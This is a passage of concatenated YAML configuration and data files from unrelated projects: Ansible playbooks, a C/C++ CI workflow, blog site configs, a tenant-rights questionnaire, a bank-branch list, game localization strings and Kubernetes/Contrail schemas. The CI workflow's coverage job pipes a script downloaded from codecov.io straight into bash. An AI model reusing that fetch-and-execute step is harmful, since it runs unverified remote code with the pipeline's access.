group: '{{ item.group | d(item.owner) }}'
mode: '0600'
with_flattened:
- '{{ ssh_private_keys }}'
- '{{ ssh_host_private_keys }}'
- '{{ ssh_group_private_keys }}'
- name: private-keys - Verify Public Key Permissions
file:
path: '{{ item.ssh_key_path | d(ssh_home_path + item.owner + ssh_key_path) }}/{{ item.key_name | d(ssh_key_name) }}.pub'
state: file
owner: '{{ item.owner }}'
group: '{{ item.group | d(item.owner) }}'
mode: '0600'
with_flattened:
- '{{ ssh_private_keys }}'
- '{{ ssh_host_private_keys }}'
- '{{ ssh_group_private_keys }}'
|
tasks/keys/private-keys_default.yml
|
---
- name: "Update Package Cache"
  apt:
    update_cache: true
when: ansible_os_family == 'Debian'
- name: "Install packages"
package:
name: "{{ required_packages }}"
state: present
- name: "Install Nginx"
import_role:
name: bifrost-nginx-install
tasks_from: install
# NOTE(TheJulia) While we don't necessarilly require /opt/stack any longer
# and it should already be created by the Ansible setup, we will leave this
# here for the time being.
- name: "Ensure /opt/stack is present"
  file:
    path: /opt/stack
    state: directory
    owner: root
    group: root
- name: "IPA-builder - Install"
include_role:
name: bifrost-pip-install
vars:
package: ironic-python-agent-builder
sourcedir: "{{ ipa_builder_git_folder }}"
source_install: true
when: install_dib | bool
# NOTE(mgoddard): IPA-builder has a dependency on diskimage-builder. Install
# DIB last to ensure it is installed from source rather than PyPI.
- name: "Diskimage-builder - Install"
include_role:
name: bifrost-pip-install
vars:
package: diskimage-builder
sourcedir: "{{ dib_git_folder }}"
source_install: true
when: install_dib | bool
- name: Ensure required packages are installed
package:
name: "{{ dib_host_required_packages | select | list }}"
state: present
when: install_dib | bool
- name: "sushy - Install"
include_role:
name: bifrost-pip-install
vars:
package: sushy
sourcedir: "{{ sushy_git_folder }}"
source_install: "{{ sushy_source_install }}"
- name: "Install vendor dependencies"
import_tasks: vendor_deps.yml
- name: "Ironic Client - Install"
include_role:
name: bifrost-pip-install
vars:
package: python-ironicclient
sourcedir: "{{ ironicclient_git_folder }}"
source_install: "{{ ironicclient_source_install }}"
# NOTE(dtantsur): no much value in installing metalsmith from source - it does
# not change often, and nothing in bifrost depends on it.
- name: "metalsmith - Install"
include_role:
name: bifrost-pip-install
vars:
package: metalsmith
source_install: false
- name: "Install pymysql"
include_role:
name: bifrost-pip-install
vars:
package: pymysql
- name: "Install extra packages for ironic"
include_role:
name: bifrost-pip-install
vars:
package: "{{ item }}"
loop: "{{ ironic_extra_packages }}"
- name: "Install Ironic using pip"
include_role:
name: bifrost-pip-install
vars:
package: ironic
sourcedir: "{{ ironic_git_folder }}"
source_install: true
- name: "Install ironic-inspector to permit use of inspection interface"
include_tasks: inspector_install.yml
when: enable_inspector | bool
- name: "Install ironic-staging-drivers"
include_tasks: staging_install.yml
when: staging_drivers_include | bool
- name: "Install openstacksdk"
include_role:
name: bifrost-pip-install
vars:
package: openstacksdk
sourcedir: "{{ openstacksdk_git_folder }}"
source_install: "{{ openstacksdk_source_install }}"
- name: "Install Ironic Prometheus Exporter"
include_tasks: prometheus_exporter_install.yml
when: enable_prometheus_exporter | bool
|
playbooks/roles/bifrost-ironic-install/tasks/install.yml
|
name: post-commit
on:
push:
paths-ignore:
- '**.md'
- 'LICENSE'
jobs:
build:
name: 'Build: ${{ matrix.config.name }} - ${{ matrix.build-type }}'
runs-on: ${{ matrix.config.os }}
strategy:
fail-fast: false
matrix:
config:
- name: Ubuntu - GCC
os: ubuntu-latest
cc: gcc-10
cxx: g++-10
- name: Ubuntu - Clang
os: ubuntu-latest
cc: clang-10
cxx: clang++-10
- name: Windows - MSVC
os: windows-latest
cc: cl
cxx: cl
- name: MacOS - Clang
os: macos-latest
cc: /usr/local/opt/llvm/bin/clang
cxx: /usr/local/opt/llvm/bin/clang++
build-type:
- Debug
- Release
steps:
- name: Checkout
uses: actions/checkout@v2
with:
submodules: recursive
- name: Configure
run: >-
cmake
-B build
-D CMAKE_BUILD_TYPE=${{ matrix.build-type }}
-D CMAKE_C_COMPILER=${{ matrix.config.cc }}
-D CMAKE_CXX_COMPILER=${{ matrix.config.cxx }}
- name: Build
run: cmake --build build --config ${{ matrix.build-type }}
- name: Test
working-directory: build
run: ctest --build-config ${{ matrix.build-type }} --output-on-failure
test-coverage:
name: 'Test Coverage: Ubuntu - GCC'
runs-on: ubuntu-latest
steps:
- name: Install lcov
        run: sudo apt-get install -y lcov
- name: Checkout
uses: actions/checkout@v2
with:
submodules: recursive
- name: Configure
run: >-
cmake
-B build
-D CMAKE_BUILD_TYPE=Debug
-D CMAKE_C_COMPILER=gcc-10
-D CMAKE_CXX_COMPILER=g++-10
-D 'CMAKE_C_FLAGS=--coverage -fno-inline -fno-inline-small-functions -fno-default-inline'
-D 'CMAKE_CXX_FLAGS=--coverage -fno-inline -fno-inline-small-functions -fno-default-inline'
- name: Build
run: cmake --build build
- name: Initialize Coverage Data
run: lcov --capture --initial --directory build --output-file build/base-coverage.info
- name: Test
working-directory: build
run: ctest --build-config Debug --output-on-failure
- name: Generate Coverage Info
run: |
lcov --capture --directory build --output-file build/coverage.info
lcov --add-tracefile build/base-coverage.info --add-tracefile build/coverage.info --output-file build/total-coverage.info
lcov --remove build/total-coverage.info '/usr/*' "$PWD"'/deps/*' --output-file build/total-coverage.info
lcov --list build/total-coverage.info
bash <(curl -s https://codecov.io/bash) -f build/total-coverage.info
|
.github/workflows/post-commit.yml
|
site_name: roel4ez | Blog
site_author: roel4ez
site_url: https://roel4ez.github.io/blog
theme:
name: material
custom_dir: overrides
language: en
palette:
- media: "(prefers-color-scheme: light)"
scheme: default
primary: teal
accent: blue
toggle:
icon: material/toggle-switch-off-outline
name: Switch to dark mode
- media: "(prefers-color-scheme: dark)"
scheme: slate
primary: teal
accent: blue
toggle:
icon: material/toggle-switch
name: Switch to light mode
icon:
repo: fontawesome/brands/github
features:
- navigation.tabs
# - navigation.tabs.sticky
- navigation.sections
#- navigation.indexes
- navigation.top
# - navigation.expand
- navigation.tracking
- search.suggest
- search.highlight
# - header.autohide
# - toc.integrate
repo_name: roel4ez/blog
repo_url: https://github.com/roel4ez/blog
#edit_uri: edit/main/
markdown_extensions:
- admonition
- pymdownx.details
- pymdownx.highlight
- pymdownx.inlinehilite
- pymdownx.superfences:
custom_fences:
- name: mermaid
class: mermaid
format: !!python/name:pymdownx.superfences.fence_div_format
- abbr
- pymdownx.snippets
- meta
- toc
- attr_list
- md_in_html
plugins:
- search
- blogging:
features:
tags:
index_page: tags.md
dirs:
- articles
theme:
name: card
- git-revision-date-localized:
type: timeago
enable_creation_date: true
fallback_to_build_date: true
extra_css:
- stylesheets/custom.css
- https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.css
extra_javascript:
- javascript/extra.js
- https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js
nav:
- 'Home': index.md
- 'Blog':
- articles/github-action-turn-on-off-vm.md
- articles/mkdocs-mike-ghpages.md
- articles/running-a-project-with-github-projects.md
- tags.md
extra:
social:
- icon: fontawesome/brands/github
link: https://github.com/roel4ez
name: roel4ez on GitHub
- icon: fontawesome/brands/twitter
link: https://twitter.com/roel4ez
name: roel4ez on Twitter
analytics:
provider: google
property: G-Y72V3MRN5X
# disqus: roel4ez-blog
copyright: "Copyright © 2022 roel4ez"
|
mkdocs.yml
|
code: |
if not_enough_heat:
add_problem(1, "Not enough heat")
if has_space_heater:
if improper_space_heater_usage:
add_problem(1, "Improper usage of space heaters")
if not electric_only_space_heaters and not proper_space_heater_venting:
add_problem(30, "Space heater does not vent to a chimney or a vent leading outside")
if not has_written_heating_agreement and landlord_required_heat_payment:
add_problem(30, "Landlord asked tenant to pay for heat without a written agreement stating the tenant must pay for heat")
if not provided_maintained_heating:
add_problem(30, "Landlord failed to provide and/or maintain heating equipment in good order")
seen_heating_season_blurb
  if cool_heating_daytime:
    add_problem(30, "Temperature dropped below 68 Fahrenheit between 7 AM and 11 PM")
  if cool_heating_nighttime:
    add_problem(30, "Temperature dropped below 64 Fahrenheit between 11 PM and 7 AM")
  if over_maximum_allowed_heating:
    add_problem(30, "Temperature exceeded 78 Fahrenheit during the heating season")
heating_completed = True
---
terms:
habitable room: |
Any room that is used for living, sleeping, cooking, or eating
heating season: |
September 16 to June 14
---
question: |
Have you ever not had enough heat?
yesno: not_enough_heat
---
question: |
Do you have any space heaters?
yesno: has_space_heater
---
question: |
Do you use a space heater because the heating system in the building does not work properly?
yesno: improper_space_heater_usage
comment: |
CR edit - https://www.mass.gov/files/documents/2017/09/11/105cmr410.pdf#page=7 (410.200: Heating Facilities Required)(B)
---
question: |
Are all of your space heaters electric?
yesno: electric_only_space_heaters
comment: |
Make this question depend on - Do you have any? How many do you have? How many are electric - choices are based on answer to how many they have
---
question: |
Do your non-electric space heaters vent to a chimney or a vent that leads outdoors?
yesno: proper_space_heater_venting
---
question: |
Have you signed a written agreement with your landlord that says **you** pay for heat?
yesnomaybe: has_written_heating_agreement
comment: |
special case for idk
---
question: |
Has your landlord made you pay for heat?
yesno: landlord_required_heat_payment
---
question: |
Has your landlord provided and maintained heating equipment in good working order?
yesno: provided_maintained_heating
comment: |
Ask this question and then ask the 3 heating season questions all in one so question starts with during the heating season and then
During the day, between 7am and 11pm, has any room been cooler than 68°F
  At night, between 11pm and 7 am, has any room been cooler than 64°F
Has the temperature ever gone over 78°F ?
---
question: |
About the {heating season}
subquestion: |
Between September 16 and June 14, your landlord must provide
equipment and appliances to heat every {habitable room} and bathroom.
field: seen_heating_season_blurb
---
question: |
During the {heating season},
fields:
- note: <div class="initial-q">has any room been cooler than 68°F between 7 AM and 11 PM?</div>
- no label: cool_heating_daytime
datatype: yesnoradio
- note: <div class="initial-q">has any room been cooler than 64°F between 11 PM and 7 AM?</div>
- no label: cool_heating_nighttime
datatype: yesnoradio
- note: <div class="initial-q">has the temperature ever gone over 78°F ?</div>
- no label: over_maximum_allowed_heating
datatype: yesnoradio
comment: |
Not sure if radio or wide is better here
|
docassemble/evictionHelp/data/questions/bad_conditions_heating.yml
|
---
'001':
code: '001'
name: 本店
kana: ホンテン
hira: ほんてん
roma: honten
'002':
code: '002'
name: 輪西
kana: ワニシ
hira: わにし
roma: wanishi
'003':
code: '003'
name: 母恋
kana: ボコイ
hira: ぼこい
roma: bokoi
'004':
code: '004'
name: 本輪西
kana: モトワニシ
hira: もとわにし
roma: motowanishi
'005':
code: '005'
name: 中島
kana: ナカジマ
hira: なかじま
roma: nakajima
'006':
code: '006'
name: 東町
kana: ヒガシマチ
hira: ひがしまち
roma: higashimachi
'007':
code: '007'
name: 小橋内
kana: オハシナイ
hira: おはしない
roma: ohashinai
'008':
code: '008'
name: 高砂
kana: タカサゴ
hira: たかさご
roma: takasago
'009':
code: '009'
name: 幌別
kana: ホロベツ
hira: ほろべつ
roma: horobetsu
'010':
code: '010'
name: 登別温泉
kana: ノボリベツオンセン
hira: のぼりべつおんせん
roma: noboribetsuonsen
'011':
code: '011'
name: 白老
kana: シラオイ
hira: しらおい
roma: shiraoi
'012':
code: '012'
name: 萩野
kana: ハギノ
hira: はぎの
roma: hagino
'013':
code: '013'
name: 苫小牧
kana: トマコマイ
hira: とまこまい
roma: tomakomai
'014':
code: '014'
name: 札幌
kana: サツポロ
hira: さつぽろ
roma: satsuporo
'015':
code: '015'
name: 白鳥台
kana: ハクチヨウダイ
hira: はくちようだい
roma: hakuchiyoudai
'016':
code: '016'
name: 鷲別
kana: ワシベツ
hira: わしべつ
roma: washibetsu
'017':
code: '017'
name: 苫小牧中央
kana: トマコマイチユウオウ
hira: とまこまいちゆうおう
roma: tomakomaichiyuuou
'018':
code: '018'
name: 札幌北
kana: サツポロキタ
hira: さつぽろきた
roma: satsuporokita
'019':
code: '019'
name: 登別
kana: ノボリベツ
hira: のぼりべつ
roma: noboribetsu
'020':
code: '020'
name: 錦岡
kana: ニシキオカ
hira: にしきおか
roma: nishikioka
'021':
code: '021'
name: 東室蘭駅前
kana: ヒガシムロランエキマエ
hira: ひがしむろらんえきまえ
roma: higashimuroranekimae
'022':
code: '022'
name: 工大前
kana: コウダイマエ
hira: こうだいまえ
roma: koudaimae
'023':
code: '023'
name: 富士町
kana: フジチヨウ
hira: ふじちよう
roma: fujichiyou
'024':
code: '024'
name: 虎杖浜
kana: コジヨウハマ
hira: こじようはま
roma: kojiyouhama
'025':
code: '025'
name: 若草
kana: ワカクサ
hira: わかくさ
roma: wakakusa
'026':
code: '026'
name: 伊達
kana: ダテ
hira: だて
roma: date
'027':
code: '027'
name: イオン登別出張所
kana: イオンノボリベツ
hira: いおんのぼりべつ
roma: ionnoboribetsu
|
data/branches/1003.yml
|
---
alias: bedroom_light_on
initial_state: true
trigger:
- platform: state
entity_id: binary_sensor.bedroom_multisensor_home_security_motion_detected
to: "on"
condition:
- condition: state
entity_id: group.bed_presence
state: "off"
- condition: state
entity_id: light.taklampe_3
state: "off"
action:
- service: light.turn_on
entity_id: light.bedroom_bed_led
- service: light.turn_on
data_template:
entity_id:
- light.bedroom
- light.taklampe_1
- light.taklampe_2
- light.taklampe_3
- light.nightstand_person1
color_temp: >-
{% if is_state("input_select.home_mode", "Dag") %}
{{ states('input_number.home_mode_day_color_temp_value') | int }}
{% elif is_state("input_select.home_mode", "Kveld") %}
{{ states('input_number.home_mode_evening_color_temp_value') | int }}
{% elif is_state("input_select.home_mode", "Natt") %}
{{ states('input_number.home_mode_night_color_temp_value') | int }}
{% else %}
180
{% endif %}
brightness_pct: >-
{% if is_state("input_select.home_mode", "Dag") %}
{{ states('input_number.home_mode_day_brightness_value') | int }}
{% elif is_state("input_select.home_mode", "Kveld") %}
{{ states('input_number.home_mode_evening_brightness_value') | int }}
{% elif is_state("input_select.home_mode", "Natt") %}
{{ states('input_number.home_mode_night_brightness_value') | int }}
{% else %}
100
{% endif %}
transition: >-
{% if is_state("input_select.home_mode", "Dag") %}
{{ states('input_number.home_mode_day_transition_value') | int }}
{% elif is_state("input_select.home_mode", "Kveld") %}
{{ states('input_number.home_mode_evening_transition_value') | int }}
{% elif is_state("input_select.home_mode", "Natt") %}
{{ states('input_number.home_mode_night_transition_value') | int }}
{% else %}
1
{% endif %}
|
automations/house/bedroom_light_on.yaml
|
l_french:
send_poem_interaction:0 "Envoyer un poème"
send_poem_interaction_desc:0 "Envoyez une œuvre personnelle touchante [recipient.Custom('FR_le_Char_Pi')][recipient.GetTitledFirstNameNoTooltip]"
send_poem_interaction.positive_auto_accept.tt:0 "Comme ce poème est positif, [recipient.GetFirstNameNoTooltip] peut l’accepter immédiatement s’il a une [opinion|El] suffisamment élevée de vous"
SEND_POEM_ROMANCE:0 "Une œuvre sur l’amour"
SEND_POEM_MOURNING:0 "Une œuvre sur le deuil"
SEND_POEM_LEGACY:0 "Une œuvre sur l’héritage"
SEND_POEM_STRIFE:0 "Une œuvre sur les conflits"
SEND_POEM_INCOMPETENCE:0 "Une œuvre détaillant son incompétence"
send_poem_interaction.success:0 "Le poème est loué"
send_poem_interaction.failure:0 "Le poème est raillé"
trait_specific_interactions.000.generate_poem:1 "#POE [actor.Custom('GeneratePoem_Title')]#!\n[actor.Custom('GeneratePoem_Intro_Rhyming')]\n[actor.Custom('GeneratePoem_Outro_Rhyming')]"
trait_specific_interactions.000.intro.part1:0 "La dernière œuvre de m[recipient.Custom2('FR_RelationToMe_OnA', SCOPE.sC('actor'))], [actor.Custom('FR_le_Char_Pi')][actor.GetTitledFirstName], fait fureur à la Cour."
trait_specific_interactions.000.intro.part3:0 "et [actor.GetFirstNameNoTooltip] me l’a dédiée publiquement."
trait_specific_interactions.000.outro:0 "Jusqu’à présent, j’ai gardé pour moi ce que j’en pensais, mais l’agitation qu’elle suscite est devenue trop importante pour que je l’ignore plus longtemps."
trait_specific_interactions.0001.t:0 "Quelques mots d’amour"
trait_specific_interactions.0001.desc.intro:0 "$trait_specific_interactions.000.intro.part1$ Elle évoque des sentiments amoureux $trait_specific_interactions.000.intro.part3$"
trait_specific_interactions.0001.desc.poem:0 "\n\n$trait_specific_interactions.000.generate_poem$\n\n"
trait_specific_interactions.0001.desc.outro:0 "$trait_specific_interactions.000.outro$"
trait_specific_interactions.0001.a:0 "Je ne sais pas vraiment quoi penser..."
trait_specific_interactions.0001.b:0 "[actor.GetFirstNameNoTooltip], je vois que c’est vraiment sincère !"
trait_specific_interactions.0001.c:0 "Pff, des inepties !"
trait_specific_interactions.0011.t:0 "Le réconfort dans les écrits"
trait_specific_interactions.0011.desc.intro:0 "$trait_specific_interactions.000.intro.part1$ Elle évoque les sentiments de chagrin et de perte, $trait_specific_interactions.000.intro.part3$"
trait_specific_interactions.0011.desc.poem:0 "\n\n$trait_specific_interactions.000.generate_poem$\n\n"
trait_specific_interactions.0011.desc.outro:0 "$trait_specific_interactions.000.outro$"
trait_specific_interactions.0011.a:0 "$trait_specific_interactions.0001.a$"
trait_specific_interactions.0011.b:0 "$trait_specific_interactions.0001.b$"
trait_specific_interactions.0011.c:0 "$trait_specific_interactions.0001.c$"
trait_specific_interactions.0021.t:0 "Des vers sur l’héritage"
trait_specific_interactions.0021.desc.intro:0 "$trait_specific_interactions.000.intro.part1$ L’œuvre évoque les souvenirs et ce que nous laissons à notre trépas, $trait_specific_interactions.000.intro.part3$"
trait_specific_interactions.0021.desc.poem:0 "\n\n$trait_specific_interactions.000.generate_poem$\n\n"
trait_specific_interactions.0021.desc.outro:0 "$trait_specific_interactions.000.outro$"
trait_specific_interactions.0021.a:0 "$trait_specific_interactions.0001.a$"
trait_specific_interactions.0021.b:0 "$trait_specific_interactions.0001.b$"
trait_specific_interactions.0031.t:0 "La combativité et la gloire"
trait_specific_interactions.0031.desc.intro:0 "$trait_specific_interactions.000.intro.part1$ L’œuvre évoque le succès et la grandeur, $trait_specific_interactions.000.intro.part3$"
trait_specific_interactions.0031.desc.poem:0 "\n\n$trait_specific_interactions.000.generate_poem$\n\n"
trait_specific_interactions.0031.desc.outro:0 "$trait_specific_interactions.000.outro$"
trait_specific_interactions.0031.a:0 "$trait_specific_interactions.0001.a$"
trait_specific_interactions.0031.b:0 "$trait_specific_interactions.0001.b$"
trait_specific_interactions.0041.t:0 "L’ignoble [recipient.GetTitleAsNameNoTooltip|l]"
trait_specific_interactions.0041.desc.intro:0 "$trait_specific_interactions.000.intro.part1$ L’œuvre est désobligeante, provocatrice, et dédiée à moi et à « l’association caractéristique de mon incompétence et de mon incontinence »."
trait_specific_interactions.0041.desc.poem:0 "\n\n$trait_specific_interactions.000.generate_poem$\n\n"
trait_specific_interactions.0041.desc.outro:0 "$trait_specific_interactions.000.outro$"
trait_specific_interactions.0041.a:0 "$trait_specific_interactions.0001.a$"
trait_specific_interactions.0041.b:0 "Hmmm. Oui. #EMP Vraiment. Amusant.#!"
|
project/ck3/base_game/localization/french/event_localization/trait_specific_events/trait_specific_interaction_events_l_french.yml
|
name: RestorePointCollectionUpdate
uid: '@azure/arm-compute.RestorePointCollectionUpdate'
package: '@azure/arm-compute'
summary: Update Restore Point collection parameters.
fullName: RestorePointCollectionUpdate
remarks: ''
isPreview: false
isDeprecated: false
type: interface
properties:
- name: provisioningState
uid: '@azure/arm-compute.RestorePointCollectionUpdate.provisioningState'
package: '@azure/arm-compute'
summary: >-
The provisioning state of the restore point collection.
**NOTE: This property will not be serialized. It can only be populated by
the server.**
fullName: provisioningState
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'provisioningState?: undefined | string'
return:
type: undefined | string
description: ''
- name: restorePointCollectionId
uid: '@azure/arm-compute.RestorePointCollectionUpdate.restorePointCollectionId'
package: '@azure/arm-compute'
summary: >-
The unique id of the restore point collection.
**NOTE: This property will not be serialized. It can only be populated by
the server.**
fullName: restorePointCollectionId
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'restorePointCollectionId?: undefined | string'
return:
type: undefined | string
description: ''
- name: restorePoints
uid: '@azure/arm-compute.RestorePointCollectionUpdate.restorePoints'
package: '@azure/arm-compute'
summary: >-
A list containing all restore points created under this restore point
collection.
**NOTE: This property will not be serialized. It can only be populated by
the server.**
fullName: restorePoints
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'restorePoints?: RestorePoint[]'
return:
type: '<xref uid="@azure/arm-compute.RestorePoint" />[]'
description: ''
- name: source
uid: '@azure/arm-compute.RestorePointCollectionUpdate.source'
package: '@azure/arm-compute'
summary: ''
fullName: source
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'source?: RestorePointCollectionSourceProperties'
return:
type: >-
<xref uid="@azure/arm-compute.RestorePointCollectionSourceProperties"
/>
description: ''
- name: tags
uid: '@azure/arm-compute.RestorePointCollectionUpdate.tags'
package: '@azure/arm-compute'
summary: Resource tags
fullName: tags
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'tags?: undefined | [key: string]: string'
return:
type: 'undefined | [key: string]: string'
description: ''
extends: <xref uid="@azure/arm-compute.UpdateResource" />
|
docs-ref-autogen/@azure/arm-compute/RestorePointCollectionUpdate.yml
|
---
path: /osallistu
title: Osallistu
description: Kehittäjä, kääntäjä, tutkija, suunnittelija, haktivisti tai toimittaja – ota meihin yhteyttä! Citizen OS toivottaa tervetulleiksi kaikki verkkodemokratiasta kiinnostuneet vapaaehtoiset.
keywords:
- kansalaishaktivisti
- verkko-osallistuminen
- hallintoteknologia
image: /assets/images/meta/vision.jpg
blocks:
get-involved-img:
class:
- d-none
- d-sm-block
style:
background: 'linear-gradient(180deg, #0EB7FE 0%, #0680FC 100%)'
min-height: 75vh
get-involved:
#label: About
title: |
Miten voin osallistua?
text: |
Auta meitä kehittämään Citizen OS -alustaa vapaaehtoisena. Olitpa sitten ohjelmistokehittäjä, kääntäjä, tutkija, suunnittelija, haktivisti tai journalisti, tule mukaan!
#### Liity kansalaishaktivistiyhteisöön
Pyöritämme globaalia yhteisöä kansalaisteknologian ja osallistavan demokratian harrastajille. Se tarjoaa tilan tiedon ja ajatusten vaihtoon e-demokratiasta ja yhteistyöhön perustuvasta päätöksenteosta, ja kaikki ovat tervetulleita. [Lisätietoja](/community/).
#### Auta kääntämisessä
Jos Citizen OS -alusta ei vielä ole tuettu omalla kielelläsi ja haluat liittyä vapaaehtoisten kääntäjiemme joukkoon, [ota rohkeasti yhteyttä osoitteeseen <EMAIL>](mailto:<EMAIL>).
Citizen OS -alustan kääntäminen uudelle kielelle on helppoa – monet vapaaehtoiset työskentelevät kanssamme joka päivä. [Tutustu](https://crowdin.com/project/citizenos-fe)!
#### Auta kehittämään avoimen lähdekoodin ohjelmistoa
Oletko ohjelmistokehittäjä tai suunnittelija, jolle online-päätöksenteon tulevaisuus on lähellä sydäntä?
Jos sinulla on parannusehdotuksia tai uusia ominaisuusideoita avoimeen lähdekoodiimme, [jaa ideasi meille rohkeasti GitHubissa](https://github.com/citizenos).
#### Auta tutkimuksessa
Jos työskentelet e-demokratian parissa, haluaisimme tavata sinut tai julkaista tekstejäsi blogissamme. Ole hyvä ja [lähetä sähköpostia kumppanuusjohtajallemme <NAME>olle osoitteeseen <EMAIL>](mailto:<EMAIL>).
#### Auta muilla tavoilla
Muiden tarjousten tiimoilta [ota yhteyttä kumppanuusjohtajaamme: <EMAIL>](mailto:<EMAIL>).
Jos haluat liittyä tiimiin, voit tutustua avoimiin työpaikkoihimme [täällä](/fi/urat/).
|
source/get-involved/data.fi.yaml
|
# Site settings
# These are used to personalize your new site. If you look in the HTML files,
# you will see them accessed via {{ site.title }}, {{ site.email }}, and so on.
# You can create any custom variable you would like, and they will be accessible
# in the templates via {{ site.myvariable }}.
title: "Joey's Notes | 黄药师的笔记本"
SEOTitle: "Joey's Notes | 黄药师的笔记本"
header-img: img/home-bg.jpg
email: <EMAIL>
description: "积累一些知识和笔记在这里,以供自己和他人参考。摄影和爱猫一样重要,代码的灵性在于生活的感悟。"
keyword: "黄药师, Joey, Notes, 黄药师的笔记本, 博客, 个人网站, 互联网, Ruby, Php, Web, JavaScript, 摄影, 设计"
url: "https://notes.miaowu.org" # your host, for absolute URL
baseurl: "" # for example, '/blog' if your blog hosted on 'host/blog'
encoding: utf-8
future: true
# SNS settings
RSS: false
weibo_username: desiver
zhihu_username: oiahoon
github_username: oiahoon
twitter_username: OiaHoon
facebook_username: oiahoon
linkedin_username: joey-huang-3b88a578
# Build settings
# from 2016, 'pygments' is unsupported on GitHub Pages. Use 'rouge' for highlighting instead.
highlighter: rouge
permalink: pretty
paginate: 10
exclude: ["less","node_modules","Gruntfile.js","package.json","README.md","README.zh.md"]
anchorjs: true # if you want to customize anchor. check out line:181 of `post.html`
# Gems
# from PR#40, to support local preview for Jekyll 3.0
plugins:
- jekyll-paginate
- jekyll-feed
- jekyll-sitemap
- jekyll-seo-tag
# Markdown settings
# replace redcarpet to kramdown,
# although redcarpet can auto highlight code, the lack of header-id make the catalog impossible, so I switch to kramdown
# document: http://jekyllrb.com/docs/configuration/#kramdown
markdown: kramdown
kramdown:
input: GFM # use Github Flavored Markdown !important
# Disqus settings
disqus_username: onice
# Netease setttings
netease_comment: false
# Analytics settings
# Baidu Analytics
# ba_track_id: [your track id]
# Google Analytics
ga_track_id: 'UA-116359540-1' # Format: UA-xxxxxx-xx
ga_domain: notes.miaowu.org
# Sidebar settings
sidebar: true # whether or not using Sidebar.
sidebar-about-description: "不养猫不玩单反,那么代码还有什么灵性呢?"
sidebar-avatar: /img/avatar-joey.jpg # use absolute URL, seeing it's used in both `/` and `/about/`
# Featured Tags
featured-tags: true # whether or not using Feature-Tags
featured-condition-size: 1 # A tag will be featured if the size of it is more than this condition value
# Progressive Web Apps
chrome-tab-theme-color: "#000000"
service-worker: true
# Friends
friends: [
{
title: "超神",
href: "https://zouchao.me/"
},
{
title: "Star Zhou",
href: "https://starzhou.com/"
},
{
title: "ZhongFox",
href: "https://zhongfox.github.io/"
},
{
title: "小涛",
href: "http://chenxiaotao.github.io/"
}
]
|
_config.yml
|
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
annotations:
controller-gen.kubebuilder.io/version: (devel)
creationTimestamp: null
name: deeppacketinspections.crd.projectcalico.org
spec:
group: crd.projectcalico.org
names:
kind: DeepPacketInspection
listKind: DeepPacketInspectionList
plural: deeppacketinspections
singular: deeppacketinspection
scope: Namespaced
versions:
- name: v1
schema:
openAPIV3Schema:
properties:
apiVersion:
description: 'APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to the latest
internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources'
type: string
kind:
description: 'Kind is a string value representing the REST resource this
object represents. Servers may infer this from the endpoint the client
submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds'
type: string
metadata:
type: object
spec:
description: DeepPacketInspectionSpec contains the values of the deep
packet inspection.
properties:
selector:
description: "The selector is an expression used to pick out the endpoints
for which deep packet inspection should be performed on. The selector
will only match endpoints in the same namespace as the DeepPacketInspection
resource. \n Selector expressions follow this syntax: \n \tlabel
== \"string_literal\" -> comparison, e.g. my_label == \"foo bar\"
\tlabel != \"string_literal\" -> not equal; also matches if label
is not present \tlabel in { \"a\", \"b\", \"c\", ... } -> true
if the value of label X is one of \"a\", \"b\", \"c\" \tlabel not
in { \"a\", \"b\", \"c\", ... } -> true if the value of label
X is not one of \"a\", \"b\", \"c\" \thas(label_name) -> True if
that label is present \t! expr -> negation of expr \texpr && expr
\ -> Short-circuit and \texpr || expr -> Short-circuit or \t( expr
) -> parens for grouping \tall() or the empty selector -> matches
all endpoints. \n Label names are allowed to contain alphanumerics,
-, _ and /. String literals are more permissive but they do not
support escape characters. \n Examples (with made-up labels): \n
\ttype == \"webserver\" && deployment == \"prod\" \ttype in {\"frontend\",
\"backend\"} \tdeployment != \"dev\" \t! has(label_name)"
type: string
type: object
status:
description: DeepPacketInspectionStatus contains status of deep packet
inspection in each node.
properties:
nodes:
items:
properties:
active:
properties:
lastUpdated:
description: Timestamp of when the active status was last
updated.
format: date-time
type: string
success:
description: Success indicates if deep packet inspection
is running on all workloads matching the selector.
type: boolean
type: object
errorConditions:
items:
properties:
lastUpdated:
description: Timestamp of when this error message was
added.
format: date-time
type: string
message:
description: Message from deep packet inspection error.
type: string
type: object
maxItems: 10
type: array
node:
description: Node identifies with a physical node from the cluster
via its hostname.
type: string
type: object
type: array
type: object
type: object
served: true
storage: true
subresources:
status: {}
status:
acceptedNames:
kind: ""
plural: ""
conditions: []
storedVersions: []
|
pkg/crds/enterprise/crd.projectcalico.org_deeppacketinspections.yaml
|
api_style: contrail
extends:
- base
id: bgp_as_a_service
parents:
project:
description: BGP as service object represents BGP peer in the virtual network
that can participate in dynamic routing with implicit default gateway of the
virtual network.
operations: CRUD
presence: optional
plural: bgp_as_a_services
prefix: /
references:
bgp_router:
description: Reference to internal BGP peer object automatically generated by
the system.
operations: CRUD
presence: system-only
control_node_zone:
$ref: types.json#/definitions/BGPaaSControlNodeZoneAttributes
description: Reference to control-node-zone for bgp-peer selection
operations: CRUD
presence: optional
service_health_check:
description: Reference to health check object attached to BGPaaS object, used
to enable BFD health check over active BGPaaS VMI.
operations: CRUD
presence: optional
virtual_machine_interface:
description: Reference to VMI on which BGPaaS BGP peering will happen.
operations: CRUD
presence: required
schema:
properties:
autonomous_system:
$ref: types.json#/definitions/AutonomousSystemType
description: Autonomous System number for the cluster which is 16 bits by default,
but can be changed to 32 bits by setting enable-4byte-as.
operations: CRUD
presence: required
bgpaas_ip_address:
$ref: types.json#/definitions/IpAddressType
description: Ip address of the BGP peer.
operations: CRUD
presence: required
bgpaas_ipv4_mapped_ipv6_nexthop:
description: True when client bgp implementation expects to receive a ipv4-mapped
ipv6 address (as opposed to regular ipv6 address) as the bgp nexthop for ipv6
routes.
